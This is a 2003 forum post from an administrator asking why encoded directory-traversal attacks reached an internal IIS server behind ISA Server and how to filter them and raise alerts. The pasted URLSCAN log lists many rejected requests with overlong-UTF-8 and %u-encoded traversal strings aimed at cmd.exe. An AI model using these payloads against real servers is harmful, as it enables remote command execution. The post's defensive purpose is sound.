Please find attached a sample of the URLSCAN log on an internal WWW server that has been published with ISA server The ISA server has SP1 and the URLSCAN filter enabled, The local server has the URLSCAN filter also My first question is: Why did these attempts pass the ISA server. I was of the opinion that the published and internal web servers would be protected by this filter. Any suggestions on resolving this? and perhaps a "white hat" site for testing ISA security for these type of attacks The last question is .... Is it possible to create a "special content filter" to filter this type of traffic and an alert when this activity is happening to protect IIS services. I This attack went on for several days. It would have been an advantage to have had an alarm that an attack was underway My current strategy is to create a filter for each offending site. Thanks Darryl 06-30-2003 - 05:38:02] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/iisadmpwd/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%a f../winnt/system32/cmd.exe' [06-30-2003 - 05:38:02] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/PBServer/..%c0%9v../winnt/system32/cmd.exe' [06-30-2003 - 05:38:02] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/iisadmpwd/..%f8%80%80%80%af../winnt/system32/cmd.exe' [06-30-2003 - 05:38:02] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/iisadmpwd/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%8 0%80%80%af../winnt/system32/cmd.exe' [06-30-2003 - 05:38:02] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/iisadmpwd/..%fc%80%80%80%80%af../winnt/system32/cmd.exe' [06-30-2003 - 05:38:05] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/iisadmpwd/..%u0025%u005c..%u0025%u005cwinnt/system32/cmd.exe' [06-30-2003 - 05:38:05] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/PBServer/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe' [06-30-2003 - 05:38:05] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/PBServer/..%c1%af../winnt/system32/cmd.exe' [06-30-2003 - 05:38:05] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/PBServer/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe' [06-30-2003 - 05:38:08] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/PBServer/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/ system32/cmd.exe' [06-30-2003 - 05:38:08] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/PBServer/..%f0%80%80%af../winnt/system32/cmd.exe' [06-30-2003 - 05:38:08] Client at 211.42.172.247: URL contains sequence '..', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/PBServer/..%u002e..%u002e/winnt/system32/cmd.exe' em32/cmd.exe'